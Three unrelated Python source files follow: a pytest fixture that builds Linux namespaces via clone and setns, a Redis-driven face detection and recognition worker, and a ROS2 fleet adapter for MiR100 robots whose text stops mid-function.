namespaces.py
|
import contextlib
import ctypes
import errno
import os
import pyroute2
import pytest
import signal
import multiprocessing
# All allowed namespace types
NAMESPACE_FLAGS = dict(mnt=0x00020000,
uts=0x04000000,
ipc=0x08000000,
user=0x10000000,
pid=0x20000000,
net=0x40000000)
STACKSIZE = 1024*1024
libc = ctypes.CDLL('libc.so.6', use_errno=True)
@contextlib.contextmanager
def keep_directory():
"""Restore the current directory on exit."""
pwd = os.getcwd()
try:
yield
finally:
os.chdir(pwd)
def mount_sys(target="/sys"):
flags = [2 | 4 | 8] # MS_NOSUID | MS_NODEV | MS_NOEXEC
flags.append(1 << 18) # MS_PRIVATE
flags.append(1 << 19) # MS_SLAVE
for fl in flags:
ret = libc.mount(b"none",
target.encode('ascii'),
b"sysfs",
fl,
None)
if ret == -1:
e = ctypes.get_errno()
raise OSError(e, os.strerror(e))
def mount_tmpfs(target, private=False):
flags = [0]
if private:
flags.append(1 << 18) # MS_PRIVATE
flags.append(1 << 19) # MS_SLAVE
for fl in flags:
ret = libc.mount(b"none",
target.encode('ascii'),
b"tmpfs",
fl,
None)
if ret == -1:
e = ctypes.get_errno()
raise OSError(e, os.strerror(e))
def _mount_proc(target):
flags = [2 | 4 | 8] # MS_NOSUID | MS_NODEV | MS_NOEXEC
flags.append(1 << 18) # MS_PRIVATE
flags.append(1 << 19) # MS_SLAVE
for fl in flags:
ret = libc.mount(b"proc",
target.encode('ascii'),
b"proc",
fl,
None)
if ret == -1:
e = ctypes.get_errno()
raise OSError(e, os.strerror(e))
def mount_proc(target="/proc"):
# We need to be sure /proc is correct. We do that in another
# process as this doesn't play well with setns().
if not os.path.isdir(target):
os.mkdir(target)
p = multiprocessing.Process(target=_mount_proc, args=(target,))
p.start()
p.join()
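# Illustrative sketch (not part of the original helpers): after entering a
# fresh mount namespace, the functions above are typically used to give that
# namespace its own /proc, /sys and a private tmpfs, e.g.:
#
#     with Namespace('mnt', 'net'):
#         mount_proc("/proc")             # done in a helper process, see above
#         mount_sys("/sys")
#         mount_tmpfs("/tmp/ns", private=True)
#
# mount_proc() forks a helper process because mixing mount() and setns() in
# the same process does not play well together (see the comment above).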
class Namespace(object):
"""Combine several namespaces into one.
This gets a list of namespace types to create and combine into one. The
combined namespace can be used as a context manager to enter all the
created namespaces and exit them at the end.
"""
def __init__(self, *namespaces):
self.next = []
self.namespaces = namespaces
for ns in namespaces:
assert ns in NAMESPACE_FLAGS
# Get a pipe to signal the future child to exit
self.pipe = os.pipe()
# First, create a child in the given namespaces
child = ctypes.CFUNCTYPE(ctypes.c_int)(self.child)
child_stack = ctypes.create_string_buffer(STACKSIZE)
child_stack_pointer = ctypes.c_void_p(
ctypes.cast(child_stack,
ctypes.c_void_p).value + STACKSIZE)
flags = signal.SIGCHLD
for ns in namespaces:
flags |= NAMESPACE_FLAGS[ns]
pid = libc.clone(child, child_stack_pointer, flags)
if pid == -1:
e = ctypes.get_errno()
raise OSError(e, os.strerror(e))
# If a user namespace, map UID 0 to the current one
if 'user' in namespaces:
uid_map = '0 {} 1'.format(os.getuid())
gid_map = '0 {} 1'.format(os.getgid())
with open('/proc/{}/uid_map'.format(pid), 'w') as f:
f.write(uid_map)
with open('/proc/{}/setgroups'.format(pid), 'w') as f:
f.write('deny')
with open('/proc/{}/gid_map'.format(pid), 'w') as f:
f.write(gid_map)
# Retrieve a file descriptor to this new namespace
self.next = [os.open('/proc/{}/ns/{}'.format(pid, x),
os.O_RDONLY) for x in namespaces]
# Keep a file descriptor to our old namespaces
self.previous = [os.open('/proc/self/ns/{}'.format(x),
os.O_RDONLY) for x in namespaces]
# Tell the child all is done and let it die
os.close(self.pipe[0])
if 'pid' not in namespaces:
os.close(self.pipe[1])
self.pipe = None
os.waitpid(pid, 0)
def __del__(self):
for fd in self.next:
os.close(fd)
for fd in self.previous:
os.close(fd)
if self.pipe is not None:
os.close(self.pipe[1])
def child(self):
"""Cloned child.
Just stay here until our parent has extracted the namespace file
descriptors from us.
"""
os.close(self.pipe[1])
# For a network namespace, enable lo
if 'net' in self.namespaces:
with pyroute2.IPRoute() as ipr:
lo = ipr.link_lookup(ifname='lo')[0]
ipr.link('set', index=lo, state='up')
# For a mount namespace, make it private
if 'mnt' in self.namespaces:
libc.mount(b"none", b"/", None,
# MS_REC | MS_PRIVATE
16384 | (1 << 18),
None)
while True:
try:
os.read(self.pipe[0], 1)
except OSError as e:
if e.errno in [errno.EAGAIN, errno.EINTR]:
continue
break
os._exit(0)
def fd(self, namespace):
"""Return the file descriptor associated to a namespace"""
assert namespace in self.namespaces
return self.next[self.namespaces.index(namespace)]
def __enter__(self):
with keep_directory():
for n in self.next:
if libc.setns(n, 0) == -1:
ns = self.namespaces[self.next.index(n)] # NOQA
e = ctypes.get_errno()
raise OSError(e, os.strerror(e))
def __exit__(self, *exc):
with keep_directory():
err = None
for p in reversed(self.previous):
if libc.setns(p, 0) == -1 and err is None:
ns = self.namespaces[self.previous.index(p)] # NOQA
e = ctypes.get_errno()
err = OSError(e, os.strerror(e))
if err:
raise err
def __repr__(self):
return 'Namespace({})'.format(", ".join(self.namespaces))
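# Usage sketch for the Namespace class above (assumed example, not from the
# original suite): the same instance can be entered and exited repeatedly,
# since file descriptors to both the new and the previous namespaces are kept.
#
#     ns = Namespace('net', 'mnt')
#     with ns:
#         ...                # runs inside the combined namespaces
#     # back in the caller's original namespaces here
#     fd = ns.fd('net')      # raw file descriptor to the created net namespace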
class NamespaceFactory(object):
"""Dynamically create namespaces as they are created.
Those namespaces are namespaces for IPC, net, mount and UTS. PID
is a bit special as we have to keep a process for that. We don't
do that to ensure that everything is cleaned
automatically. Therefore, the child process is killed as soon as
we got a file descriptor to the namespace. We don't use a user
namespace either because we are unlikely to be able to exit it.
"""
def __init__(self, tmpdir):
self.namespaces = {}
self.tmpdir = tmpdir
def __call__(self, ns):
"""Return a namespace. Create it if it doesn't exist."""
if ns in self.namespaces:
return self.namespaces[ns]
self.namespaces[ns] = Namespace('ipc', 'net', 'mnt', 'uts')
with self.namespaces[ns]:
mount_proc()
mount_sys()
# Also set up the "namespace-dependent" directory
self.tmpdir.join("ns").ensure(dir=True)
mount_tmpfs(str(self.tmpdir.join("ns")), private=True)
return self.namespaces[ns]
@pytest.fixture
def namespaces(tmpdir):
return NamespaceFactory(tmpdir)
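# Hypothetical test consuming the fixture above (illustrative only; the test
# name and body are assumptions, not part of this module):
#
#     def test_something_isolated(namespaces):
#         with namespaces('ns1'):
#             # private ipc/net/mnt/uts namespaces are active; /proc, /sys
#             # and the per-namespace tmpfs under tmpdir/ns are mounted
#             ...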
|
face.py
|
import _thread as thread
import ast
import io
import json
import os
import sqlite3
import sys
import time
import warnings
from multiprocessing import Process
sys.path.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)), "."))
from shared import SharedOptions
if SharedOptions.PROFILE == "windows_native":
sys.path.append(os.path.join(SharedOptions.APP_DIR,"windows_packages"))
import numpy as np
import torch
# import cv2
import torch.nn.functional as F
import torchvision.transforms as transforms
from PIL import Image, UnidentifiedImageError
from process import YOLODetector
from recognition import FaceRecognitionModel
from redis import RedisError, StrictRedis
import traceback
def load_faces():
master_face_map = {"map": {}}
SELECT_FACE = "SELECT * FROM {}".format(SharedOptions.TB_EMBEDDINGS)
conn = sqlite3.connect(SharedOptions.DATA_DIR + "/faceembedding.db")
cursor = conn.cursor()
embeddings = cursor.execute(SELECT_FACE)
embedding_arr = []
i = 0
for row in embeddings:
embedding = row[1]
user_id = row[0]
embedding = ast.literal_eval(embedding)
embedding_arr.append(embedding)
master_face_map["map"][i] = user_id
i += 1
master_face_map["tensors"] = embedding_arr
facemap = repr(master_face_map)
SharedOptions.db.set("facemap", facemap)
conn.close()
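# Shape of the value stored under the "facemap" Redis key (illustrative,
# user ids and numbers are made up):
#
#     {
#         "map": {0: "alice", 1: "bob"},          # row index -> userid
#         "tensors": [[0.12, -0.03, ...], ...],   # one embedding per user
#     }
#
# It is serialized with repr() here and parsed back with ast.literal_eval()
# in the "recognize" branch of face() below.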
def face(thread_name, delay):
if SharedOptions.MODE == "High":
reso = SharedOptions.SETTINGS.FACE_HIGH
elif SharedOptions.MODE == "Low":
reso = SharedOptions.SETTINGS.FACE_LOW
else:
reso = SharedOptions.SETTINGS.FACE_MEDIUM
faceclassifier = FaceRecognitionModel(
os.path.join(SharedOptions.SHARED_APP_DIR, "facerec-high.model"),
cuda=SharedOptions.CUDA_MODE,
)
detector = YOLODetector(
os.path.join(SharedOptions.SHARED_APP_DIR, SharedOptions.SETTINGS.FACE_MODEL),
reso,
cuda=SharedOptions.CUDA_MODE,
)
load_faces()
ADD_FACE = "INSERT INTO TB_EMBEDDINGS(userid,embedding) VALUES(?,?)"
UPDATE_FACE = "UPDATE TB_EMBEDDINGS SET embedding = ? where userid = ?"
SELECT_FACE = "SELECT * FROM TB_EMBEDDINGS where userid = ? "
trans = transforms.Compose(
[
transforms.Resize((112, 112)),
transforms.ToTensor(),
transforms.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5]),
]
)
IMAGE_QUEUE = "face_queue"
while True:
queue = SharedOptions.db.lrange(IMAGE_QUEUE, 0, 0)
SharedOptions.db.ltrim(IMAGE_QUEUE, len(queue), -1)
if len(queue) > 0:
for req_data in queue:
req_data = json.JSONDecoder().decode(req_data)
task_type = req_data["reqtype"]
req_id = req_data["reqid"]
if task_type == "detect":
img_id = req_data["imgid"]
img_path = os.path.join(SharedOptions.TEMP_PATH, img_id)
try:
threshold = float(req_data["minconfidence"])
det = detector.predict(img_path, threshold)
os.remove(img_path)
outputs = []
for *xyxy, conf, cls in reversed(det):
x_min = xyxy[0]
y_min = xyxy[1]
x_max = xyxy[2]
y_max = xyxy[3]
score = conf.item()
detection = {
"confidence": score,
"x_min": int(x_min),
"y_min": int(y_min),
"x_max": int(x_max),
"y_max": int(y_max),
}
outputs.append(detection)
output = {"success": True, "predictions": outputs}
except UnidentifiedImageError:
err_trace = traceback.format_exc()
print(err_trace, file=sys.stderr, flush=True)
output = {
"success": False,
"error": "invalid image",
"code": 400,
}
except Exception:
err_trace = traceback.format_exc()
print(err_trace, file=sys.stderr, flush=True)
output = {
"success": False,
"error": "error occured on the server",
"code": 500,
}
finally:
SharedOptions.db.set(req_id, json.dumps(output))
if os.path.exists(img_path):
os.remove(img_path)
elif task_type == "register":
try:
user_id = req_data["userid"]
user_images = req_data["images"]
conn = sqlite3.connect(
SharedOptions.DATA_DIR + "/faceembedding.db"
)
batch = None
for img_id in user_images:
img_path = os.path.join(SharedOptions.TEMP_PATH , img_id)
pil_image = Image.open(img_path).convert("RGB")
det = detector.predict(img_path, 0.55)
os.remove(img_path)
outputs = []
new_img = None
for *xyxy, conf, cls in reversed(det):
x_min = xyxy[0]
y_min = xyxy[1]
x_max = xyxy[2]
y_max = xyxy[3]
new_img = pil_image.crop(
(int(x_min), int(y_min), int(x_max), int(y_max))
)
break
if new_img is not None:
img = trans(new_img).unsqueeze(0)
if batch is None:
batch = img
else:
batch = torch.cat([batch, img], 0)
if batch is None:
output = {
"success": False,
"error": "no face detected",
"code": 400,
}
SharedOptions.db.set(req_id, json.dumps(output))
continue
img_embeddings = faceclassifier.predict(batch).cpu()
img_embeddings = torch.mean(img_embeddings, 0)
cursor = conn.cursor()
emb = img_embeddings.tolist()
emb = repr(emb)
exist_emb = cursor.execute(SELECT_FACE, (user_id,))
user_exist = False
for row in exist_emb:
user_exist = True
break
if user_exist:
cursor.execute(UPDATE_FACE, (emb, user_id))
message = "face updated"
else:
cursor.execute(ADD_FACE, (user_id, emb))
message = "face added"
conn.commit()
output = {"success": True, "message": message}
conn.close()
except UnidentifiedImageError:
err_trace = traceback.format_exc()
print(err_trace, file=sys.stderr, flush=True)
output = {
"success": False,
"error": "invalid image",
"code": 400,
}
except Exception:
err_trace = traceback.format_exc()
print(err_trace, file=sys.stderr, flush=True)
output = {
"success": False,
"error": "error occured on the server",
"code": 500,
}
finally:
SharedOptions.db.set(req_id, json.dumps(output))
for img_id in user_images:
if os.path.exists(os.path.join(SharedOptions.TEMP_PATH , img_id)):
os.remove(os.path.join(SharedOptions.TEMP_PATH , img_id))
elif task_type == "recognize":
try:
master_face_map = SharedOptions.db.get("facemap")
master_face_map = ast.literal_eval(master_face_map)
facemap = master_face_map["map"]
face_array = master_face_map["tensors"]
if len(face_array) > 0:
face_array_tensors = [
torch.tensor(emb).unsqueeze(0) for emb in face_array
]
face_tensors = torch.cat(face_array_tensors)
if SharedOptions.CUDA_MODE and len(face_array) > 0:
face_tensors = face_tensors.cuda()
img_id = req_data["imgid"]
threshold = float(req_data["minconfidence"])
img = os.path.join(SharedOptions.TEMP_PATH , img_id)
pil_image = Image.open(img).convert("RGB")
det = detector.predict(img, 0.55)
os.remove(img)
faces = [[]]
detections = []
found_face = False
for *xyxy, conf, cls in reversed(det):
found_face = True
x_min = int(xyxy[0])
y_min = int(xyxy[1])
x_max = int(xyxy[2])
y_max = int(xyxy[3])
new_img = pil_image.crop((x_min, y_min, x_max, y_max))
img_tensor = trans(new_img).unsqueeze(0)
if len(faces[-1]) % 10 == 0 and len(faces[-1]) > 0:
faces.append([img_tensor])
else:
faces[-1].append(img_tensor)
detections.append((x_min, y_min, x_max, y_max))
if not found_face:
output = {"success": True, "predictions": []}
SharedOptions.db.set(req_id, json.dumps(output))
elif len(facemap) == 0:
predictions = []
for face in detections:
x_min = int(face[0])
if x_min < 0:
x_min = 0
y_min = int(face[1])
if y_min < 0:
y_min = 0
x_max = int(face[2])
if x_max < 0:
x_max = 0
y_max = int(face[3])
if y_max < 0:
y_max = 0
user_data = {
"confidence": 0,
"userid": "unknown",
"x_min": x_min,
"y_min": y_min,
"x_max": x_max,
"y_max": y_max,
}
predictions.append(user_data)
output = {"success": True, "predictions": predictions}
SharedOptions.db.set(req_id, json.dumps(output))
else:
embeddings = []
for face_list in faces:
embedding = faceclassifier.predict(torch.cat(face_list))
embeddings.append(embedding)
embeddings = torch.cat(embeddings)
predictions = []
for embedding, face in zip(embeddings, detections):
embedding = embedding.unsqueeze(0)
embedding_proj = torch.cat(
[embedding for i in range(face_tensors.size(0))]
)
similarity = F.cosine_similarity(
embedding_proj, face_tensors
)
user_index = similarity.argmax().item()
max_similarity = (similarity.max().item() + 1) / 2
if max_similarity < threshold:
confidence = 0
user_id = "unknown"
else:
confidence = max_similarity
user_id = facemap[user_index]
x_min = int(face[0])
if x_min < 0:
x_min = 0
y_min = int(face[1])
if y_min < 0:
y_min = 0
x_max = int(face[2])
if x_max < 0:
x_max = 0
y_max = int(face[3])
if y_max < 0:
y_max = 0
user_data = {
"confidence": confidence,
"userid": user_id,
"x_min": x_min,
"y_min": y_min,
"x_max": x_max,
"y_max": y_max,
}
predictions.append(user_data)
output = {"success": True, "predictions": predictions}
except UnidentifiedImageError:
err_trace = traceback.format_exc()
print(err_trace, file=sys.stderr, flush=True)
output = {
"success": False,
"error": "invalid image",
"code": 400,
}
except Exception:
err_trace = traceback.format_exc()
print(err_trace, file=sys.stderr, flush=True)
output = {
"success": False,
"error": "error occured on the server",
"code": 500,
}
finally:
SharedOptions.db.set(req_id, json.dumps(output))
if os.path.exists(os.path.join(SharedOptions.TEMP_PATH , img_id)):
os.remove(os.path.join(SharedOptions.TEMP_PATH , img_id))
elif task_type == "match":
try:
user_images = req_data["images"]
img1 = os.path.join(SharedOptions.TEMP_PATH , user_images[0])
img2 = os.path.join(SharedOptions.TEMP_PATH , user_images[1])
image1 = Image.open(img1).convert("RGB")
image2 = Image.open(img2).convert("RGB")
det1 = detector.predict(img1, 0.8)
det2 = detector.predict(img2, 0.8)
os.remove(img1)
os.remove(img2)
if len(det1) == 0 or len(det2) == 0:
output = {"success": False, "error": "no face found"}
SharedOptions.db.set(req_id, json.dumps(output))
continue
for *xyxy, conf, cls in reversed(det1):
x_min = xyxy[0]
y_min = xyxy[1]
x_max = xyxy[2]
y_max = xyxy[3]
face1 = trans(
image1.crop(
(int(x_min), int(y_min), int(x_max), int(y_max))
)
).unsqueeze(0)
break
for *xyxy, conf, cls in reversed(det2):
x_min = xyxy[0]
y_min = xyxy[1]
x_max = xyxy[2]
y_max = xyxy[3]
face2 = trans(
image2.crop(
(int(x_min), int(y_min), int(x_max), int(y_max))
)
).unsqueeze(0)
break
faces = torch.cat([face1, face2], dim=0)
embeddings = faceclassifier.predict(faces)
embed1 = embeddings[0, :].unsqueeze(0)
embed2 = embeddings[1, :].unsqueeze(0)
similarity = (
F.cosine_similarity(embed1, embed2).item() + 1
) / 2
output = {"success": True, "similarity": similarity}
except UnidentifiedImageError:
err_trace = traceback.format_exc()
print(err_trace, file=sys.stderr, flush=True)
output = {
"success": False,
"error": "invalid image",
"code": 400,
}
except Exception:
err_trace = traceback.format_exc()
print(err_trace, file=sys.stderr, flush=True)
output = {
"success": False,
"error": "error occured on the server",
"code": 500,
}
finally:
SharedOptions.db.set(req_id, json.dumps(output))
if os.path.exists(os.path.join(SharedOptions.TEMP_PATH , user_images[0])):
os.remove(os.path.join(SharedOptions.TEMP_PATH , user_images[0]))
if os.path.exists(os.path.join(SharedOptions.TEMP_PATH , user_images[1])):
os.remove(os.path.join(SharedOptions.TEMP_PATH , user_images[1]))
time.sleep(delay)
def update_faces(thread_name, delay):
while True:
load_faces()
time.sleep(delay)
if __name__ == "__main__":
p1 = Process(target=update_faces, args=("", 1))
p1.start()
p = Process(target=face, args=("", SharedOptions.SLEEP_TIME))
p.start()
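# Note on the matching score (illustrative sketch, not part of the service):
# cosine similarity lies in [-1, 1]; the "recognize" and "match" branches
# above rescale it to [0, 1] with (similarity + 1) / 2 before comparing it
# against the request threshold, e.g.:
#
#     import torch
#     import torch.nn.functional as F
#     a = torch.randn(1, 512)   # hypothetical embedding of a detected face
#     b = torch.randn(1, 512)   # hypothetical embedding of a stored face
#     score = (F.cosine_similarity(a, b).item() + 1) / 2   # in [0, 1]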
|
report_positions_in_rmf_coord.py
|
# Code attribution from https://github.com/osrf/rmf/blob/master/ros2/fleet_adapter_mir/fleet_adapter_mir/fleet_adapter_mir/
import enum
import math
import time
import argparse
import json
import threading
import nudged
from datetime import datetime
import mir100_client
from mir100_client.rest import ApiException
from mir100_client.models import PostMissionQueues, PostMissions, PostMissionActions, PutStatus
import urllib3
import rclpy
from rclpy.node import Node
from rmf_fleet_msgs.msg import PathRequest, ModeRequest, RobotState, FleetState, \
Location, RobotMode, ModeParameter
class Robot():
def __init__(self, parent):
self.parent = parent
self.name = None
self.api = None
self.missions = {}
self.maps = {}
self.positions = {}
self.current_map = None
self.current_target = None
self.prev_target = None
self.place_sub = None
self.mode_sub = None
self.mode = None
self.current_task_id = 'idle'
self.remaining_path = []
self.docking_executed = False
self.docking_requested = False
# Variables for managing the path queue execution thread
self._path_following_thread = None
self._path_quit_event = threading.Event()
self._path_quit_cv = threading.Condition()
def cancel_path(self):
self.remaining_path.clear()
self.mode = RobotMode.MODE_PAUSED
if self._path_following_thread is not None:
self._path_quit_event.set()
self._path_quit_cv.acquire()
self._path_quit_cv.notify_all()
self._path_quit_cv.release()
self._path_following_thread.join()
self.api.mission_queue_delete()
def follow_new_path(self, msg):
self.docking_requested = False
self.docking_executed = False
self.current_task_id = msg.task_id
self.cancel_path()
# Set the MiR state from PAUSE (if paused) to READY every time a new path is received
# pick up from commit 15b2bfc
status = PutStatus(state_id=MirState.READY)
self.api.status_put(status)
def path_following_closure():
# This function defines a worker thread that will wake up at whatever times are needed
while (not self._path_quit_event.is_set()) and self.remaining_path:
next_ros_time = self.remaining_path[0].t
next_mission_time = next_ros_time.sec + next_ros_time.nanosec/1e9
next_mission_wait = next_mission_time - time.time()
# print(f'next_mission_time: {next_mission_time}, \
# next_mission_wait: {next_mission_wait}')
if next_mission_wait <= 0 and self.mode == MirState.READY and self.remaining_path:
self.remaining_path.pop(0)
if not self.remaining_path:
return
next_mission_location = self.remaining_path[0]
mir_p = self.parent.rmf2mir_transform.transform(
[next_mission_location.x, next_mission_location.y])
mir_location = Location()
mir_location.x = mir_p[0]
mir_location.y = mir_p[1]
yaw = math.degrees(
next_mission_location.yaw
+ self.parent.rmf2mir_transform.get_rotation()
)
print(
f'RMF location x:{next_mission_location.x} y:{next_mission_location.y}')
if yaw > 180.0:
yaw = yaw - 360.0
elif yaw <= -180.0:
yaw = yaw + 360.0
mir_location.yaw = yaw
print(f'location: {mir_location}')
# Check whether mission is in mission list
mission_name = f'move_coordinate_to_{mir_location.x:.2f}_{mir_location.y:.2f}_{mir_location.yaw:.2f}'
if mission_name not in self.missions:
print(f'Creating a new mission named {mission_name}')
mission_id = self.parent.create_move_coordinate_mission(
self, mir_location)
else:
mission_id = self.missions[mission_name]
try:
mission = PostMissionQueues(mission_id=mission_id)
self.api.mission_queue_post(mission)
except KeyError:
self.parent.get_logger().error(
f'no mission to move coordinates to [{mir_location.x:3f}_{mir_location.y:.3f}]!'
)
continue
self._path_quit_cv.acquire()
self._path_quit_cv.wait(next_mission_wait)
self._path_quit_cv.release()
self.remaining_path = msg.path
self._path_quit_event.clear()
self._path_following_thread = threading.Thread(
target=path_following_closure)
self._path_following_thread.start()
class MirState(enum.IntEnum):
READY = 3
PAUSE = 4
EXECUTING = 5
MANUAL_CONTROL = 11
ERROR = 12
class MirPositionTypes(enum.IntEnum):
ROBOT = 0
CHARGING_STATION = 7
CHARGING_STATION_ENTRY = 8
class FleetDriverMir(Node):
FLEET_NAME = 'mir100'
STATUS_PUB_PERIOD = 1.0
def __init__(self, fleet_config):
super().__init__('fleet_driver_mir')
self.fleet_config = fleet_config
self.robots = {}
self.api_clients = []
self.status_pub = self.create_publisher(FleetState, 'fleet_states', 1)
self.pub_timer = self.create_timer(
self.STATUS_PUB_PERIOD, self.pub_fleet
)
self.ref_coordinates_rmf = [[26.95, -20.23], [29.26, -22.38], [11.4, -16.48],
[12.46, -16.99]]
self.ref_coordinates_mir = [[7.2, 16.6], [5.15, 18.35], [23, 12.35],
[22.05, 12.95]]
self.rmf2mir_transform = nudged.estimate(
self.ref_coordinates_rmf,
self.ref_coordinates_mir
)
self.mir2rmf_transform = nudged.estimate(
self.ref_coordinates_mir,
self.ref_coordinates_rmf
)
mse = nudged.estimate_error(self.rmf2mir_transform,
self.ref_coordinates_rmf,
self.ref_coordinates_mir)
self.get_logger().info(f'transformation estimate error: {mse}')
for api_client in self.create_all_api_clients(self.fleet_config):
self.get_logger().info(f'initializing robot from \
{api_client.configuration.host}')
robot = Robot(self)
robot.api = mir100_client.DefaultApi(api_client)
# temporary retry configuration to workaround startup race condition while launching
connection_pool_kw = robot.api.api_client.rest_client.pool_manager.connection_pool_kw
orig_retries = connection_pool_kw.get('retries')
retries = urllib3.Retry(10)
retries.backoff_factor = 1
retries.status_forcelist = (404,)
connection_pool_kw['retries'] = retries
mir_status = robot.api.status_get()
robot.name = mir_status.robot_name
self.load_missions(robot)
self.update_positions(robot)
# reset retries
if orig_retries is not None:
connection_pool_kw['retries'] = orig_retries
else:
del connection_pool_kw['retries']
self.robots[robot.name] = robot
self.get_logger().info(f'successfully initialized robot \
{robot.name}')
# Setup fleet driver ROS2 topic subscriptions
self.path_request_sub = self.create_subscription(
PathRequest, '/robot_path_requests', self.on_path_request, 1
)
self.mode_sub = self.create_subscription(
ModeRequest, f'/robot_mode_requests', self.on_robot_mode_request, 1
)
def pub_fleet(self):
fleet_state = FleetState()
fleet_state.name = self.FLEET_NAME
now = time.time()
now_sec = int(now)
now_ns = int((now - now_sec) * 1e9)
try:
for robot in self.robots.values():
api_response = robot.api.status_get()
robot_state = RobotState()
robot_state.name = robot.name
robot_state.task_id = robot.current_task_id
robot_state.battery_percent = api_response.battery_percentage
location = Location()
location.x = api_response.position.x
location.y = api_response.position.y
location.yaw = api_response.position.orientation
# TODO Transform yaw from MiR frame to RMF frame
mir_pos = [location.x, location.y]
rmf_pos = self.mir2rmf_transform.transform(mir_pos)
rmf_location = Location()
rmf_location.x = rmf_pos[0]
rmf_location.y = rmf_pos[1]
rmf_location.yaw = math.radians(
location.yaw) + self.mir2rmf_transform.get_rotation()
robot_state.location = rmf_location
robot_state.path = robot.remaining_path
robot_state.location.t.sec = now_sec
robot_state.location.t.nanosec = now_ns
if api_response.mission_text.startswith('Charging'):
robot_state.mode.mode = RobotMode.MODE_CHARGING
robot.mode = MirState.READY
elif api_response.state_id == MirState.PAUSE:
robot_state.mode.mode = RobotMode.MODE_PAUSED
robot.mode = MirState.PAUSE
elif api_response.state_id == MirState.EXECUTING and \
not api_response.mission_text.startswith('Charging'):
robot_state.mode.mode = RobotMode.MODE_MOVING
robot.mode = MirState.EXECUTING
elif api_response.state_id == MirState.READY:
robot_state.mode.mode = RobotMode.MODE_IDLE
robot.mode = MirState.READY
# print(f'[{api_response.state_id}] [{api_response.state_text}] [{api_response.mission_text}]')
fleet_state.robots.append(robot_state)
if robot.docking_requested:
if not robot.docking_executed:
robot.docking_executed = (
'docking' in api_response.mission_text.lower())
if robot.docking_executed and api_response.state_id == MirState.READY:
robot_state.mode.mode = RobotMode.MODE_IDLE
else:
robot_state.mode.mode = RobotMode.MODE_DOCKING
self.status_pub.publish(fleet_state)
except ApiException as e:
self.get_logger().warn('Exception when calling \
DefaultApi->status_get: %s\n' % e)
def on_robot_mode_request(self, msg):
robot = self.robots.get(msg.robot_name)
if not robot:
self.get_logger().info(
f'Could not find a robot named [{msg.robot_name}]')
return
if robot.current_task_id == msg.task_id:
self.get_logger().info(f'Already following task [{msg.task_id}]')
return
robot.cancel_path()
# Mapping from RMF modes to MiR modes
# manual control is MiR mode 11
mir_mode_request_dict = {
RobotMode.MODE_MOVING: MirState.READY,
RobotMode.MODE_PAUSED: MirState.PAUSE
}
desired_mir_mode = mir_mode_request_dict.get(msg.mode.mode)
if desired_mir_mode:
self.get_logger().info(
f'setting robot {msg.robot_name} mode to {msg.mode}')
status = PutStatus(state_id=desired_mir_mode)
robot.api.status_put(status)
return
if not msg.parameters:
self.get_logger().info(
f'Mode [{msg.mode.mode}] not recognized or requires additional parameters'
)
return
# Find the mission
mission_str = f'{msg.parameters[0].name}_{msg.parameters[0].value}'
self.get_logger().info(
f'Attempting to send mission [{mission_str}] to robot [{msg.robot_name}]')
try:
mission_id = robot.missions[mission_str].guid
except KeyError:
self.get_logger().error(f'Cannot find mission [{mission_str}]')
return
# Execute the mission
try:
mission = PostMissionQueues(mission_id=mission_id)
robot.api.mission_queue_post(mission)
except KeyError:
self.get_logger().error('Error when posting charging mission')
return
if msg.parameters[0].name == 'docking':
robot.docking_requested = True
robot.docking_executed = False
print(' === We are in docking mode')
robot.current_task_id = msg.task_id
def calculate_path_request_yaw(self, location_request, location_request_next):
dx = location_request_next.x - location_request.x
dy = location_request_next.y - location_request.y
return math.atan2(dy, dx)
def on_path_request(self, msg):
robot = self.robots.get(msg.robot_name)
if not robot:
self.get_logger().info(
f'Could not find robot with the name [{msg.robot_name}]')
return
if robot.current_task_id == msg.task_id:
self.get_logger().info(f'Already received task [{msg.task_id}].')
return
self.get_logger().info(
f'Issuing task [{msg.task_id}] to robot [{msg.robot_name}]')
robot.follow_new_path(msg)
def load_missions(self, robot):
self.get_logger().info('retrieving missions...')
robot_missions_ls = robot.api.missions_get()
# If name starts with 'move_coordinate'
for i in robot_missions_ls:
if "move_coordinate" in i.name:
print("removing {}".format(i.name))
robot.api.missions_guid_delete(i.guid)
self.get_logger().info(f'retrieved {len(robot.missions)} missions')
def create_move_coordinate_mission(self, robot, location, retries=10):
mission = PostMissions(
group_id='mirconst-guid-0000-0001-missiongroup',
name=f'move_coordinate_to_{location.x:.3f}_{location.y:.3f}',
description='automatically created by mir fleet adapter',
)
response = robot.api.missions_post(mission)
action = PostMissionActions(
action_type='move_to_position',
mission_id=response.guid,
parameters=[
{'id': 'x', 'value': location.x},
{'id': 'y', 'value': location.y},
{'id': 'orientation', 'value': location.yaw},
{'id': 'retries', 'value': retries},
{'id': 'distance_threshold', 'value': 0.1},
],
priority=1
)
response2 = robot.api.missions_mission_id_actions_post(
mission_id=response.guid,
body=action
)
self.get_logger().info(
f'created mission to move coordinate to "{location}"')
return response.guid
def create_dock_mission(self, robot, dock_name):
mission = PostMissions(
# mir const, retrieved with GET /mission_groups
group_id='mirconst-guid-0000-0001-missiongroup',
name=f'dock_to_{dock_name}',
description='automatically created by mir fleet adapter',
)
response = robot.api.missions_post(mission)
action = PostMissionActions(
action_type='docking',
mission_id=response.guid,
parameters=[
{'id': 'marker', 'value': dock_name},
],
priority=1
)
response2 = robot.api.missions_mission_id_actions_post(
mission_id=response.guid,
body=action
)
self.get_logger().info(f'created mission to move to "{dock_name}"')
return response.guid
def create_move_mission(self, robot, place_name, retries=10):
'''
creates a mission to move to metamap place
'''
mission = PostMissions(
# mir const, retrieved with GET /mission_groups
group_id='mirconst-guid-0000-0001-missiongroup',
name=f'move_to_{place_name}',
description='automatically created by mir fleet adapter',
)
response = robot.api.missions_post(mission)
dist_threshold = 0.1
action = PostMissionActions(
action_type='move',
mission_id=response.guid,
parameters=[
{'id': 'position', 'value': robot.positions[place_name].guid},
{'id': 'retries', 'value': retries},
{'id': 'distance_threshold', 'value': dist_threshold},
],
priority=1
)
response2 = robot.api.missions_mission_id_actions_post(
mission_id=response.guid,
body=action
)
self.get_logger().info(f'created mission to move to "{place_name}"')
return response.guid
def update_positions(self, robot):
self.get_logger().info('retrieving positions...')
count = 0
now = datetime.now()
stamp = now.strftime("%y%m%d_%H%M")
stamp = "mir_positions_transformed_"+stamp
big_dict = []
with open(stamp+".json", "w+") as f:
for pos in robot.api.positions_get():
if pos.name not in robot.positions or pos.guid != robot.positions[pos.name].guid:
if pos.type_id == MirPositionTypes.ROBOT or \
pos.type_id == MirPositionTypes.CHARGING_STATION_ENTRY:
